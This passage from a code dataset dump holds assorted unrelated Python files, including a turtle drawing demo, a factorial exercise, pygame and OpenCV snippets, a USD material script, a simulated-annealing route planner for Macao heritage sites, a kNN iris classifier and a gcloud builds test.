i==0:\n\t\t\tx,y=pos()\n\t\tpendown()\n\t\tcircle(r)\n\t\tpenup()\n\t\tright(360/n)\n\t\tang=(180-360/n)/2\n\t\tforward(r*(2-2*(cos(ang/180*pi))))\ndef c(l,r=5,n=36):\n\ts=2*r\n\tfor i in range(l):\n\t\tt(r=r,n=n)\n\t\tpenup()\n\t\thome()\n\t\tleft(90)\n\t\tforward(s)\n\t\ts+=2*r\n\t\tsetheading(0)\n\t\tang=(180-360/n)/2\n\t\tk=cos(ang/180*pi)\n\t\tr=r*((1+k)/(1-k))\n\tdone()\nc(6)","sub_path":"demo/turtledemo/draw_cycle.py","file_name":"draw_cycle.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"34536151","text":"#silnia liczona rekurencyjnie\n#n!=n*(n-1!)\ndef silnia(n):\n if n==0 or n==1:\n return 1\n else:\n return n*silnia(n-1)\nn = int(input(\"Podaj liczbe calkowita dodatnia n < 20 \\n\"))\nwhile n<0 or n>20:\n print(\"Podales licze spoza zakresu\")\n break\nelse:\n a = silnia(n)\n print('silnia liczby', n, '! = ', a)\n","sub_path":"lekcja7.silnia.rekurencyjna.py","file_name":"lekcja7.silnia.rekurencyjna.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"450032963","text":"import pygame\n\npygame.init()\n\nSCREEN_SIZE = 500\nSTEP = 20\n\nscreen = pygame.display.set_mode((SCREEN_SIZE, SCREEN_SIZE))\n\n\nrunning = 1\n\nwhile running:\n event = pygame.event.poll()\n if event.type == pygame.QUIT:\n running = 0\n\n screen.fill((0, 0, 0))\n for y in range(SCREEN_SIZE // STEP):\n pygame.draw.line(screen, (255, 0, 255), (0, y * STEP), (SCREEN_SIZE - y * STEP, 0))\n\n pygame.display.flip()\n","sub_path":"src/lesson07/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"477692635","text":"'''Attempt to set a material on the kitchen fridge'''\n\nimport os\nimport argparse\n\nfrom pxr import Gf, Kind, Sdf, Usd, UsdGeom, UsdShade\n\n\nEXPORT_NAME = 'KitchenFridgeMaterial.usda'\nTEXTURE_FILE = os.path.abspath('../textures/UV_Grid_Sm.jpg')\nFRIDGE_PATH = '/Kitchen_set/Props_grp/North_grp/FridgeArea_grp/Refridgerator_1/Geom/Body'\n\ndef get_parser():\n parser = argparse.ArgumentParser(description='Add a texture to a Kitchen scene table save it')\n\n parser.add_argument('kitchen', help='Kitchen set file location')\n\n return parser\n\ndef make_material(stage, path):\n # Create material\n material = UsdShade.Material.Define(stage, path)\n mat_path = material.GetPath()\n stInput = material.CreateInput('frame:stPrimvarName', Sdf.ValueTypeNames.Token)\n stInput.Set('st')\n\n pbrShader = UsdShade.Shader.Define(stage, mat_path.AppendPath('PBRShader'))\n pbrShader.CreateIdAttr('UsdPreviewSurface')\n\n stReader = UsdShade.Shader.Define(stage, mat_path.AppendPath('stReader'))\n stReader.CreateIdAttr('UsdPrimvarReader_float2')\n stReader.CreateInput('varname',Sdf.ValueTypeNames.Token).ConnectToSource(stInput)\n\n diffuseTextureSampler = UsdShade.Shader.Define(stage, mat_path.AppendPath('diffuseTexture'))\n diffuseTextureSampler.CreateIdAttr('UsdUVTexture')\n diffuseTextureSampler.CreateInput('file', Sdf.ValueTypeNames.Asset).Set(TEXTURE_FILE)\n diffuseTextureSampler.CreateInput('st', Sdf.ValueTypeNames.Float2).ConnectToSource(stReader, 'result')\n diffuseTextureSampler.CreateOutput('rgb', Sdf.ValueTypeNames.Float3)\n pbrShader.CreateOutput('diffuseColor', Sdf.ValueTypeNames.Color3f).ConnectToSource(diffuseTextureSampler, 'rgb')\n\n material.CreateSurfaceOutput().ConnectToSource(pbrShader, 
'surface')\n\n return material\n\ndef main():\n\n parser = get_parser()\n\n args = parser.parse_args()\n\n # Make the stage\n stage = Usd.Stage.Open(os.path.abspath(args.kitchen))\n\n # Create material\n material = make_material(stage, FRIDGE_PATH + '/grid_material')\n\n # Bind materials\n tileFloorPrim = stage.GetPrimAtPath(FRIDGE_PATH)\n treeIter = iter(Usd.PrimRange.AllPrims(tileFloorPrim))\n for prim in treeIter:\n gprim = UsdGeom.Gprim.Get(stage, prim.GetPath())\n UsdShade.MaterialBindingAPI(gprim).Bind(material)\n\n # Export Stage\n stage.Export(EXPORT_NAME)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"material_tests/kitchen_material_test.py","file_name":"kitchen_material_test.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"650830387","text":"# Main calls this class to get the key mapping, up down left right, for the game that is being played\n# This could be called in the initialization of a player, and have the keys as attributes of the object\n# i.e. player.up, player.down, player.right, player.left = getUp()\n# would give the player the keys necessary for moving around.\n#\n\nimport pygame, random\nfrom pygame.locals import *\n\n\n\narrowkeys = [K_UP, K_DOWN, K_LEFT, K_RIGHT]\nallalphabetkeys = [K_a, K_b, K_c, K_d, K_e, K_f, K_g, K_h, K_i, K_j, K_k, K_l, K_m, K_n, K_o, K_p,K_q, K_r, K_s, K_t, K_u,\n K_v, K_w, K_x, K_y, K_z]\nnumberkeys = [K_0, K_1, K_2, K_3, K_4, K_5, K_6, K_7, K_8, K_9]\n\n\ndef getKeys(difficulty):\n\n\n if difficulty == 0:\n up = K_UP\n down = K_DOWN\n left = K_LEFT\n right = K_RIGHT\n\n if difficulty == 1:\n random.shuffle(arrowkeys)\n up = arrowkeys[0]\n down = arrowkeys[1]\n left = arrowkeys[2]\n right = arrowkeys[3]\n\n if difficulty == 2:\n up = K_w\n down = K_s\n left = K_a\n right = K_d\n\n if difficulty == 10:\n random.shuffle(allalphabetkeys)\n up = allalphabetkeys[0]\n down = allalphabetkeys[1]\n left = allalphabetkeys[2]\n right = allalphabetkeys[3]\n\n return up, down, left, right #this is mapped out North south east west","sub_path":"Alpha_Release/key_mapping.py","file_name":"key_mapping.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"494041862","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on \n@author: weishan_lee\n\nSight-seeing order of Macao World Heritage Sites\nCase 2: Travel distance or time for pairs of cities recorded in the following csv files: \n (1) carTime.csv records time required for driving a car.\n (2) busTime.csv records time required for taking a bus.\n (3) pedestrianTime.csv records time required by walking between a pair of cities.\n (4) carDistance.csv records distance between a pair of sites by car.\n (5) pedestrianDistance.csv records distance between a pair of sites by foot.\n The optimal route is found based on the Simulated Annealing and Metropolis Algorithm. \nVersion 3_2: 1. Write to log.txt automatically.\n 2. Add funcion definition plotRoute\n 3. 
Modify function distance\n\"\"\"\nfrom math import exp\nimport numpy as np\nimport random as rand\nfrom vpython import * \nimport pandas as pd\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import AutoMinorLocator\nfrom sklearn import preprocessing\nmin_max_scaler = preprocessing.MinMaxScaler()\nimport sys\nimport os.path\n\n## Function Definitions\n\n# Function to calculate the updated total distance or time of the tour\ndef distanceUpdate(i, j, oldScore, randomList, rCoor):\n s = oldScore\n lList = len(randomList)\n\n if abs(i-j)==1:\n if ij\n if j == 0: \n jF = randomList[-1]\n else:\n jF = randomList[j-1]\n \n jC = randomList[j]\n jN = randomList[j+1]\n \n iF = randomList[i-1]\n iC = randomList[i]\n if i == lList-1: \n iN = randomList[0]\n else:\n iN = randomList[i+1] \n \n if jC!=iF or jN!=iC: print(\"WRONG! jC!=iF or jN!=iC! LINE 78\")\n s = s - rCoor[jF,jC] - rCoor[jC,jN] - rCoor[iC,iN]\n s = s + rCoor[jF,iC] + rCoor[iC,jC] + rCoor[jC,iN]\n else:\n \n if i == 0: \n iF = randomList[-1]\n else:\n iF = randomList[i-1]\n \n iC = randomList[i]\n \n if i == lList-1: \n iN = randomList[0]\n else:\n iN = randomList[i+1]\n \n if j == 0: \n jF = randomList[-1]\n else:\n jF = randomList[j-1]\n \n jC = randomList[j]\n if j == lList-1: \n jN = randomList[0]\n else:\n jN = randomList[j+1]\n \n s = s - rCoor[iF,iC] - rCoor[iC,iN] - rCoor[jF,jC] - rCoor[jC,jN]\n s = s + rCoor[iF,jC] + rCoor[jC,iN] + rCoor[jF,iC] + rCoor[iC,jN] \n return s\n\n# Function to calculate the initial total distance or time of the tour\ndef distance(randomList, rCoor):\n s = 0.0\n for i in range(N):\n j = randomList[i-1]\n k = randomList[i]\n s += rCoor[j,k]\n return s\n\n# output of the score (distance vs time steps)\ndef outPutScrVSTime(tRecord, scoreRecord):\n data = {'timeStep': tRecord,'score':scoreRecord}\n dfCSV = pd.DataFrame(data)\n dfCSV_file = open('./scoreVSTime.csv','w',newline='') \n dfCSV.to_csv(dfCSV_file, sep=',', encoding='utf-8',index=False)\n dfCSV_file.close()\n \ndef outPutSitesOrder(randomList):\n ## Write randomList back to cities datafram\n \n sites[\"sitesOrder\"] = randomList\n \n sitesOrder = pd.DataFrame(columns = ['sitesId', 'Name'])\n sitesOrder_file = open(\"./sightSeeingOrder.csv\",'w',newline='') \n\n for i in range(N+1):\n if i == N:\n integer = np.uint32(sites.loc[0].sitesOrder)\n sitesOrder.loc[i] = integer, sites.loc[integer].Name\n else:\n integer = np.uint32(sites.loc[i].sitesOrder)\n sitesOrder.loc[i] = integer, sites.loc[integer].Name\n\n sitesOrder.to_csv(sitesOrder_file, sep=',', encoding='utf-8', index=False) \n sitesOrder_file.close()\n\ndef plotRoute(rr, sites):\n x = []\n y = []\n n = [int(num) for num in rCoor[:,3].tolist()]\n\n for i in range(N+1):\n if i == N:\n x.append( sites.loc[n[0]].X )\n y.append( sites.loc[n[0]].Y )\n else:\n x.append( sites.loc[n[i]].X )\n y.append( sites.loc[n[i]].Y )\n fig, ax = plt.subplots()\n ax.title.set_text(\"Optimal Tour Path\")\n\n ax.plot(x,y,'k-')\n ax.scatter(x[0],y[0],c='blue')\n ax.scatter(x[1:-1],y[1:-1],c='red')\n\n for i, txt in enumerate(n):\n ax.annotate(txt, (x[i], y[i]))\n\n ax.set_xlabel(\"Longitude\",size = 12)\n ax.set_ylabel(\"Latitude\",size = 12)\n ax.ticklabel_format(useOffset=False)\n plt.grid(True)\n plt.savefig(\"optimalTourPath.eps\") \n \ndef writeLog(msg):\n with open('log.txt', 'a+') as the_file:\n print(msg)\n the_file.write(msg)\n\nimport os, psutil\n# If previous log.txt file exists, remove it.\nif os.path.exists(\"./log.txt\"):\n os.remove(\"./log.txt\")\n \ndef 
cpu_stats():\n pid = os.getpid()\n py = psutil.Process(pid)\n memory_use = py.memory_info()[0] / 2. ** 30\n return 'Memory: ' + str(np.round(memory_use, 2)) + 'GB\\t'\n\n########################## Parameters and Options ############################\n## If you need animation?\nanimation = False\n## If you need to record score vs time step?\nscoreVsTime = False\n\n## Set up Case and load matrix of time or distance for each pair of cities.\n# case = 1: car Time. \n# case = 2: bus time. Some pair of route may be replaced by pedestrian time.\n# case = 3: pedestrin time.\n# case = 4: car distance.\n# cas3 = 5: pedestrian distance.\ncase = 4\n\n## Parameters for Simulated annealing\nTmax = 1.0\nTmin = 1e-2\ntau = 1e3\ntargetScore = 13.916 # carTime 78. busTime = 117. pedestrianTime = 115.\n # carDistance 13.916. pedestrianDistance = 7.844\n###############################################################################\n\n# Load world heritage sites locations\nsites = pd.read_csv(\"./macauWHSLoc.csv\")\nR = 0.02\nN = sites.shape[0]\n\n## normalize data\n\nsites['normX'] = min_max_scaler.fit_transform(sites.X.values.reshape(-1, 1))\nsites['normY'] = min_max_scaler.fit_transform(sites.Y.values.reshape(-1, 1))\n\nif case == 1:\n matrix_ = pd.read_csv(\"./carTime.csv\")\nelif case == 2:\n matrix_ = pd.read_csv(\"./busTime.csv\")\nelif case == 3:\n matrix_ = pd.read_csv(\"./pedestrianTime.csv\")\nelif case == 4:\n matrix_ = pd.read_csv(\"./carDistance.csv\")\nelse:\n matrix_ = pd.read_csv(\"./pedestrianDistance.csv\")\n\nN = 25 # number of sites\n\n# Set up the initial configuration\nrandomList = rand.sample(range(0, N), N)\n\n## Change sites dataframe to rCoor array \n# rCoor could mean the time or distance of a pair of cities.\n\nrCoor = np.empty([N,N])\nfor i in range(N):\n for j in range(N):\n rCoor[i,j] = matrix_.iloc[i][j] # matrix value\n\n## Change sites dataframe to rPlot array\nrPlot = np.empty([N+1,4])\nfor i in range(N):\n j = randomList[i]\n rPlot[i,0] = sites.normX[j]\n rPlot[i,1] = sites.normY[j]\n rPlot[i,2] = 0.0\n rPlot[i,3] = sites.SiteId[j]\n \n# Add one more ending site which is identical the starting site\nrPlot[N,0] = rPlot[0,0]\nrPlot[N,1] = rPlot[0,1]\nrPlot[N,2] = rPlot[0,2]\nrPlot[N,3] = rPlot[0,3]\n\n#Calculate the initial distance\n\nscore = distance(randomList, rCoor)\ninitScore = score\nminScore = initScore\nmsg = \"Initial score = {:.5f}\\n\".format(initScore)\n\noldScore = score\n\n# Write the log.txt file for the first time.\nwriteLog(msg)\n\n# Set up the graphics\nif animation == True:\n scene = canvas(center=vector(0.5,0.5,0.0), background = color.white)\n for i in range(N):\n if i == 0:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.blue)\n else:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.black)\n l = curve(pos=rPlot.tolist(),radius=R/4,color = color.red)\n\n## Simulated annealing\n## Main loop\n\ntRecord = []\nscoreRecord = []\n\nt0=0 # setting up the beginning of the time \"lump\"\ntRecord += [0]\nscoreRecord += [score]\n\nfirstInitial = True\n\nwhile (score>targetScore):\n \n if firstInitial == False: \n # Set up another initial configuration\n randomList = rand.sample(range(0, N), N)\n\n ## Change sites dataframe to rCoor array\n rCoor = np.empty([N,N])\n for i in range(N):\n for j in range(N):\n rCoor[i,j] = matrix_.iloc[i][j] \n \n #Calculate the initial distance\n score = distance(randomList, rCoor)\n\n ## Change sites dataframe to rPlot array\n rPlot = np.empty([N+1,4])\n for i in range(N):\n j = 
randomList[i]\n rPlot[i,0] = sites.normX[j]\n rPlot[i,1] = sites.normY[j]\n rPlot[i,2] = 0.0\n rPlot[i,3] = sites.SiteId[j]\n \n # Add one more ending site which is identical the starting site\n rPlot[N,0] = rPlot[0,0]\n rPlot[N,1] = rPlot[0,1]\n rPlot[N,2] = rPlot[0,2]\n rPlot[N,3] = rPlot[0,3]\n \n if animation == True:\n # Set up the graphics\n scene.delete()\n scene = canvas(center=vector(0.5,0.5,0.0), background = color.white)\n for i in range(N):\n if i == 0:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.blue)\n else:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.black)\n l = curve(pos=rPlot.tolist(),radius=R/4,color = color.red)\n\n T = Tmax\n t = 0\n while (T>Tmin):\n # Cooling\n t += 1\n T = Tmax*exp(-t/tau)\n\n # Choose two sites to swap and make sure they are distinct\n i,j = rand.randrange(1,N),rand.randrange(1,N)\n while i==j:\n i,j = rand.randrange(1,N),rand.randrange(1,N)\n \n # Swap them and calculate the change in score\n oldScore = score\n \n rPlot[i,0],rPlot[j,0] = rPlot[j,0],rPlot[i,0]\n rPlot[i,1],rPlot[j,1] = rPlot[j,1],rPlot[i,1]\n rPlot[i,2],rPlot[j,2] = rPlot[j,2],rPlot[i,2]\n rPlot[i,3],rPlot[j,3] = rPlot[j,3],rPlot[i,3]\n \n score = distanceUpdate(i,j,oldScore,randomList,rCoor)\n \n randomList[i], randomList[j] = randomList[j], randomList[i]\n scoreCheck = distance(randomList, rCoor)\n if abs(score-scoreCheck)>1e-4:\n randomList[i], randomList[j] = randomList[j], randomList[i]\n msg = \"Score Error! Line 359.\\n\" +\\\n \"i = {}, j = {}, randomList[i] = {}, randomList[j] = {}\\n\".format(i,j,randomList[i],randomList[j]) +\\\n \"score = {}, scoreCheck = {}\".format(score,scoreCheck)\n writeLog(msg)\n sys.exit()\n \n deltaScore = score - oldScore\n\n try:\n ans = np.exp(-deltaScore/T)\n except OverflowError:\n if -deltaScore/T > 0:\n ans = float('inf')\n else:\n ans = 0.0\n \n # If the move is rejected, swap them back again\n if rand.random() > ans:\n \n randomList[i], randomList[j] = randomList[j], randomList[i]\n \n rPlot[i,0],rPlot[j,0] = rPlot[j,0],rPlot[i,0]\n rPlot[i,1],rPlot[j,1] = rPlot[j,1],rPlot[i,1]\n rPlot[i,2],rPlot[j,2] = rPlot[j,2],rPlot[i,2]\n rPlot[i,3],rPlot[j,3] = rPlot[j,3],rPlot[i,3]\n score = oldScore\n if np.abs(score - distance(randomList, rCoor))>1e-5:\n msg = \"score: {}\".format(score)\n writeLog(msg)\n msg = \"distance: {}\".format(distance(randomList, rCoor))\n writeLog(msg)\n msg = \"Error Line 390\"\n writeLog(msg)\n sys.exit()\n \n if animation == True: \n # Update the visualization every 100 moves\n if t%100==0:\n rate(25)\n for i in range(N+1):\n pos = vector(rPlot[i,0],rPlot[i,1],0.0)\n l.modify(i,pos)\n \n if scoreVsTime == True:\n #if t%1==0:\n tRecord += [t0+t]\n scoreRecord += [score]\n \n #writeLog(cpu_stats())\n \n if score < minScore: \n minScore = score\n outPutScrVSTime(tRecord, scoreRecord)\n outPutSitesOrder(randomList)\n dt = datetime.now()\n msg = str(dt.year) + '/' + str(dt.month) + '/' + str(dt.day) + ' ' +\\\n str(dt.hour) + ':' + str(dt.minute) + ':' + str(dt.second) +'\\t'\n writeLog(msg)\n msg = \"Delta score = {:.5f}\\t\".format(deltaScore)\n writeLog(msg)\n msg = \"New score = {:.5f}\\n\".format(score)\n writeLog(msg) \n \n t0 = t0 + t # go to next time \"lump\"\n firstInitial = False\n# End of Main Loop\nif case == 1 or case == 2 or case == 3:\n msg = \"The initial total traveling time = {:.5f} min\\n\".format(initScore)\n writeLog(msg)\n msg = \"The optimal total traveling time = {:.5f} min\\n\".format(score)\n writeLog(msg)\nelse:\n msg = \"The initial total 
traveling distance = {:.5f} km\\n\".format(initScore)\n writeLog(msg)\n msg = \"The optimal total traveling distance = {:.5f} km\\n\".format(score)\n writeLog(msg)\n\n# plot score vs t\nplt.figure()\nplt.title(\"traveling time vs Iteration\")\nax = plt.gca()\nenVsTime = pd.read_csv( \"./scoreVSTime.csv\") \nplt.plot(enVsTime.timeStep,enVsTime.score,'k-')\nplt.minorticks_on()\nminorLocatorX = AutoMinorLocator(5) # number of minor intervals per major # inteval\nminorLocatorY = AutoMinorLocator(5)\nax.set_xlabel(\"Iteration\",size = 16)\nif case == 1 or case == 2 or case == 3:\n ax.set_ylabel(\"Total traveling time (min)\",size = 16)\nelse:\n ax.set_ylabel(\"Total traveling distance (km)\",size = 16)\nax.xaxis.set_minor_locator(minorLocatorX) # add minor ticks on x axis\nax.yaxis.set_minor_locator(minorLocatorY) # add minor ticks on y axis\nplt.grid(True)\n#plt.xlim(-20000,500000)\nplt.savefig(\"scoreVsTime.eps\")\nplt.show() \n\nscoreCheck = distance(randomList, rCoor)\nif case == 1 or case == 2 or case == 3:\n msg = \"The checked optimal total traveling time = {:.5f} min\".format(scoreCheck)\n writeLog(msg)\nelse:\n msg = \"The checked optimal total traveling distance = {:.5f} km\".format(scoreCheck)\n writeLog(msg)","sub_path":"SAMAV3_2.py","file_name":"SAMAV3_2.py","file_ext":"py","file_size_in_byte":14926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"366969403","text":"from sklearn.datasets import load_iris\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom matplotlib import pyplot as plt\nfrom argparse import ArgumentParser\nimport numpy as np\nimport math\niris = load_iris()\n\nparser = ArgumentParser()\nparser.add_argument(\"-k\", type=int, action=\"store\", dest=\"k_value\")\nparser.add_argument(\"--print-guesses\", action=\"store_true\", dest=\"print_guesses\")\nparser.add_argument('kvals', metavar='N', type=int, nargs='+')\nargs = parser.parse_args()\n\nx_iris, y_iris = iris.data, iris.target\nx_names, y_names = iris.feature_names, iris.target_names\n\nnormalizador = StandardScaler().fit(x_iris)\nXn_iris = normalizador.transform(x_iris)\n\nx_train, x_test, y_train, y_test = train_test_split(x_iris, y_iris, test_size = 0.25)\n\ndef l2_dist(p, q):\n squares_sum = 0.0\n n = len(p)\n if n != len(q):\n raise ValueError(\"Oh noes!\")\n for i in (i for i in range(n)):\n squares_sum += (p[i] - q[i])**2\n return math.sqrt(squares_sum)\n\ndef f(D, x, k):\n dist = []\n labels = []\n i = 0\n for val in D:\n dist.append((l2_dist(val, x), i))\n i += 1\n dist.sort(key = lambda t: t[0])\n\n for i in range(k):\n labels.append(y_train[dist[i][1]])\n return max(labels, key=labels.count), (labels.count(max(labels, key=labels.count))/k)*100, \n\nfor k_value in args.kvals:\n percentages = []\n for i in range(10):\n if(args.print_guesses):\n print(\"%-15s%-15s%-15s\"%(\"Etiqueta\", \"Correcta\", \"Certeza\"))\n correct_labelling_count = 0\n for i in range(len(x_test)):\n l, p = f(x_train, x_test[i], k_value)\n correct_label = y_test[i]\n if(args.print_guesses):\n print(\"%-15i%-15i%-15.2f\"%(l, correct_label, p))\n if l == correct_label:\n correct_labelling_count += 1\n percentages.append(correct_labelling_count/len(x_test))\n percentages = np.array(percentages, dtype=float)\n\n print(\"K = %i\"%(k_value))\n print(\"Media = %.2f%%\"%(percentages.mean()*100))\n print(\"Desv. Est. 
= %.2f\"%(percentages.std()))","sub_path":"Patrones/Clase10/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"336038700","text":"import csv\nimport json\nfrom datetime import datetime\n\ndef ToCSV_separately(Province_list):\n path_peifix = 'D:\\MyGit\\Real-time-dynamic-query-of-pneumonia\\Data Record Separately\\\\'\n for province in Province_list:\n file_path = path_peifix+province.provinceShortName+'.csv'\n csv_file = open(file_path, 'a+', newline='')\n title = ['sort','确诊','疑似','治愈','死亡','修改时间']\n writer = csv.writer(csv_file)\n writer.writerow(title)\n \n modify_time = datetime.fromtimestamp(province.modifyTime/1000)\n time_str = datetime.strftime(modify_time,'%Y-%m-%d %H:%M:%S')\n writer.writerow([province.sort,province.num_confirmed,province.num_suspected,province.num_cured,province.num_dead,time_str])\n csv_file.close()\n\ndef DicToCSV(dic_data,file_name):\n path = 'D:\\MyGit\\Real-time-dynamic-query-of-pneumonia\\Data Record csv\\\\' + file_name\n csv_file = open(path, 'w+', newline='')\n keys = []\n writer = csv.writer(csv_file)\n for dic in dic_data:\n keys = dic.keys()\n # 写入列名\n writer.writerow(keys)\n break\n\n for dic in dic_data:\n for key in keys:\n if key not in dic:\n dic[key] = ''\n writer.writerow(dic.values())\n csv_file.close()","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"648607667","text":"# coding: utf8\nimport pytest\nfrom app.views import answers as an\nfrom app.views import templates as t\nfrom tests.helpers.fake_i18n import I18N\nfrom tests.helpers.fake_base_message import FakeMessage\nfrom app.views.helpers import Types\n\n\n@pytest.mark.unit\n@pytest.mark.views\n@pytest.mark.answers\ndef test__inside_get(state, monkeypatch):\n monkeypatch.setattr(an, \"I18N\", I18N)\n monkeypatch.setattr(t, \"SystemException\", FakeMessage)\n an.SystemException._get(state)\n\n\n@pytest.mark.unit\n@pytest.mark.views\n@pytest.mark.answers\ndef test__get(state, data, monkeypatch):\n monkeypatch.setattr(an, \"I18N\", I18N)\n monkeypatch.setattr(t, \"SystemException\", FakeMessage)\n answer = an.SystemException.get(state)\n\n assert answer[\"chat_id\"] == data[\"id\"]\n assert answer[\"message_type\"] == Types.TEXT_MESSAGE\n assert isinstance(answer[\"text\"], str)\n","sub_path":"tests/units/answers/test__system_exception.py","file_name":"test__system_exception.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"550086201","text":"# -*- coding: utf-8 -*- #\n# Copyright 2020 Google LLC. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests that exercise build creation.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.calliope import base as calliope_base\nfrom tests.lib import test_case\nfrom tests.lib.surface.compute.builds import submit_test_base as test_base\n\n\nclass MachineTypeTest(test_base.SubmitTestBase):\n\n def PreSetUp(self):\n self.track = calliope_base.ReleaseTrack.GA\n\n def testCreateMachineTypeSuccess(self):\n b_out = self.cloudbuild_v1_messages.Build(\n createTime='2016-03-31T19:12:32.838111Z',\n id='123-456-789',\n images=[\n 'gcr.io/my-project/image',\n ],\n projectId='my-project',\n status=self._statuses.QUEUED,\n logsBucket='gs://my-project_cloudbuild/logs',\n source=self.cloudbuild_v1_messages.Source(\n storageSource=self.cloudbuild_v1_messages.StorageSource(\n bucket='my-project_cloudbuild',\n object=self.frozen_zip_filename,\n generation=123,\n )),\n steps=test_base.DOCKER_BUILD_STEPS,\n logUrl='mockLogURL',\n timeout='600.000s',\n options=self.cloudbuild_v1_messages.BuildOptions(\n machineType=self._vmtypes.N1_HIGHCPU_8),\n )\n b_in = self.cloudbuild_v1_messages.Build(\n images=[\n 'gcr.io/my-project/image',\n ],\n source=self.cloudbuild_v1_messages.Source(\n storageSource=self.cloudbuild_v1_messages.StorageSource(\n bucket='my-project_cloudbuild',\n object=self.frozen_zip_filename,\n generation=123,\n )),\n steps=test_base.DOCKER_BUILD_STEPS,\n options=self.cloudbuild_v1_messages.BuildOptions(\n machineType=self._vmtypes.N1_HIGHCPU_8),\n )\n self.ExpectMessagesForSimpleBuild(b_in, b_out)\n\n self._Run([\n 'builds', 'submit', 'gs://bucket/object.zip',\n '--tag=gcr.io/my-project/image', '--machine-type=n1-highcpu-8',\n '--async'\n ])\n self.AssertErrContains(\n \"\"\"\\\nCreated [https://cloudbuild.googleapis.com/v1/projects/my-project/builds/123-456-789].\n\"\"\",\n normalize_space=True)\n self.AssertOutputContains(\n \"\"\"\\\nID CREATE_TIME DURATION SOURCE IMAGES STATUS\n123-456-789 2016-03-31T19:12:32+00:00 - gs://my-project_cloudbuild/{frozen_zip_filename} - QUEUED\n\"\"\".format(frozen_zip_filename=self.frozen_zip_filename),\n normalize_space=True)\n\n def testCreateWrongMachineType(self):\n with self.assertRaises(Exception):\n self._Run([\n 'builds', 'submit', '--tag=gcr.io/my-project/image',\n '--machine-type=n1-wrong-1', '--no-source'\n ])\n\n def testCreateUnspecifiedMachineType(self):\n with self.assertRaises(Exception):\n self._Run([\n 'builds', 'submit', '--tag=gcr.io/my-project/image',\n '--machine-type=unspecified', '--no-source'\n ])\n\n\nclass MachineTypeTestBeta(MachineTypeTest):\n\n def PreSetUp(self):\n self.track = calliope_base.ReleaseTrack.BETA\n\n\nclass MachineTypeTestAlpha(MachineTypeTestBeta):\n\n def PreSetUp(self):\n self.track = calliope_base.ReleaseTrack.ALPHA\n\n\nif __name__ == '__main__':\n 
test_case.main()\n","sub_path":"google-cloud-sdk/lib/tests/unit/surface/builds/submit_tests/machine_type_test.py","file_name":"machine_type_test.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"505880080","text":"#!/usr/bin/env python\n\nimport cv2\nimport numpy as np\n\n\n# Template Matching Class\nclass Template:\n\n\t# Set up the template contour for later use\n\tdef __init__(self):\n\t\tself.__template_image__ = cv2.imread(\"template.png\")\n\t\tself.__template_image__ = cv2.cvtColor(self.__template_image__, cv2.COLOR_BGR2HSV)\n\t\tself.__template_image__ = cv2.inRange(self.__template_image__, np.array([0, 0, 2]), np.array([255, 255, 255]))\n\t\t_, contours, h = cv2.findContours(self.__template_image__, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\t\tareas = [cv2.contourArea(c) for c in contours]\n\t\tmx_indx = np.argmax(areas)\n\t\tself.__template_contour__ = contours[mx_indx]\n\n\t# Compare the list of contours to the template and sort by the closest matching contours.\n\t# Returns a 2d array, first column contains a number representing the match, smaller the number,\n\t# the closer the contour is to the template, second column represents the array index in the\n\t# originally passed list\n\tdef list_of_matched(self, contours):\n\t\tlist_of_matches = []\n\t\tindex = 0\n\t\tfor c in contours:\n\t\t\tlist_of_matches.append([cv2.matchShapes(self.__template_contour__, c, 1, 0.0), index])\n\t\t\tindex += 1\n\t\tlist_of_matches = sorted(list_of_matches, key=lambda x: x[0])\n\t\treturn list_of_matches\n\n\t# Get the index of the best matched contour in passed list of contours\n\tdef best_match(self, contours):\n\t\treturn self.list_of_matched(contours)[0][1]\n\n\t# For debugging, Just to see what the template looks like\n\tdef get_image_to_show(self):\n\t\treturn 